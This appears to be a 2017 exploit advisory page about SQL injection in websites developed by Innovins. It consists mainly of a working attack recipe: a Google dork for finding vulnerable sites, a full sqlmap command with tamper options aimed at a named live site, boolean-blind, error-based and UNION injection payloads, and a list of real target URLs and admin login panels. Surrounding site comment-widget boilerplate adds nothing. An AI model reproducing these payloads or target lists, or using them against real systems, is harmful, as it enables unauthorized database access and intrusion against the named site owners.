Innovins Sql İnjection Vulnerability

2017.09.05
Credit: Turkz.org
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # Exploit Title: Innovins Sql İnjection Vulnerability # Author : Sipahiler & TURKZ.org # Google Dork : intext:"Developed by Innovins" & inurl:id= # Tested on : Kali Linux 2017.1 Chrome, Firefox # Date : 2017-09-05 # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] Sqlmap And Manuel Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS --threads=10 --no-cast --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3 --batch --dbs -u "http://www.charlstondsouza.com/event1.php?id=11" Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL# Demo : http://www.charlstondsouza.com/event1.php?id=11 http://www.pehl.co.in/page.php?id=17 http://www.sunrich.co.in/article.php?id=2 http://www.charlstondsouza.com/sn-panel/admin-login.php http://pehl.co.in/admin/login.php http://www.sunrich.co.in/admin Note: Look İn The Source Code To Find The Admin Panel

References:

http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/
http://www.trazer.org/2017/09/innovins-sql-injection-vulnerability.html


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top